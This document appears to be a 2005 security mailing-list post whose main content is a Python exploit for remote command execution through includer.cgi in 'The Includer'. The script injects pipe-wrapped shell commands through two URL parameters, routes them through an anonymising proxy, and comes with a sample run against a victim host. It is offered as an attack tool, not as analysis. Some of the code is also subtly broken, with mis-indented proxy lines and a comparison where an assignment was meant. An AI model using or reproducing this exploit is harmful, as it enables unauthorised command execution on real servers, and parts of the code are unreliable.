<<< Date Index >>>     <<< Thread Index >>>

[badroot.org] The Includer remote commands execution exploit



[badroot security] includer.cgi remote commands execution vulnerability remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badroot.org
# PRIVATE - FUNNY, WITH PROXY !!!
#
# mozako@ganja:~$ ./includer.py -h http://host-vuln.com/ -c uname -ar
# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# The Includer remote commands execution exploit
# PRIVATE - FUNNY, WITH PROXY !!!
# by: mozako
# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Type '1' for includer.cgi?=[] injection or '2' for includer.cgi?template=[] injection: 2
# [X] Connecting...
# Type your proxy (IP:PORT) here: 148.244.150.58:80
# [X] Proxing... [OK]
# [X] Sending exploit... [OK]
# [X] Exploited !
#
# Linux ipx10254 2.4.21-192-smp4G #1 SMP Wed Feb 18 19:27:48 UTC 2004 i686 i686 i386 GNU/Linux
#
# enjoy !
import sys
import urllib
import linecache
__argv__ = sys.argv
print """=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Includer remote commands execution exploit
PRIVATE - FUNNY, WITH PROXY !!!
by: mozako
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="""
def usage():
   print """
The Includer remote commands execution exploit
by: mozako
7.3.2005
Usage:
$ ./phpN.py -h http://123.4.5.6/Includer_PATH/ -c COMMAND
         """
   sys.exit(-1)
if len(__argv__) < 4:
   usage()
host = __argv__[2]
if len(__argv__) > 4:
   __argv__=__argv__[4:]
   send=""
   for elem in __argv__[:-1]:
       send=send+elem+"%20"
   send = send + __argv__[-1]
else:
   send == __argv__[4]
def hack2():
   print "[X] Connecting..."
   proxer = raw_input("Type your proxy (IP:PORT) here: ")
proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list)
   print "[X] Proxing...",
   url = urllib.FancyURLopener(proxy)
   print "[OK]"
   print "[X] Sending exploit...",
   stack = url.open(host + "includer.cgi?template=|" + send + "|")
   read = stack.read()
   print "[OK]"
   print "[X] Exploited !\n"
   t_file = open('temp.txt', 'w')
   print >> t_file, read
   t_file = open('temp.txt', 'r')
   for line in linecache.getlines("temp.txt"):
       if(line[0:16]=="document.write('"):
           print line[16:-4]
       elif(line[0:18]=="document.writeln('"):
           print line[18:-4]
       elif(line[0]=="<"):
           pass
       elif(line[0:2]=="*/"):
           pass
       elif(line[0:2]=="/*"):
           pass
       else:
           print line[:-1]
def hack():
   print "[X] Connecting..."
   proxer = raw_input("Type your proxy (IP:PORT) here: ")
proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list)
   print "[X] Proxing...",
   url = urllib.FancyURLopener(proxy)
   print "[OK]"
   print "[X] Sending exploit...",
   stack = url.open(host + "includer.cgi?=|" + send + "|")
   read = stack.read()
   print "[OK]"
   print "[X] Exploited !\n"
   t_file = open('temp.txt', 'w')
   print >> t_file, read
   t_file = open('temp.txt', 'r')
   for line in linecache.getlines("temp.txt"):
       if(line[0:16]=="document.write('"):
           print line[16:-4]
       elif(line[0:18]=="document.writeln('"):
           print line[18:-4]
       elif(line[0]=="<"):
           pass
       elif(line[0:2]=="*/"):
           pass
       elif(line[0:2]=="/*"):
           pass
       else:
           print line[:-1]
choise = raw_input("Type '1' for includer.cgi?=[] injection or '2' for includer.cgi?template=[] injection: ")
if choise == "1":
   hack()
if choise == "2":
   hack2()
# eof

enjoy,
mozako - mozako [at] mybox [dot] it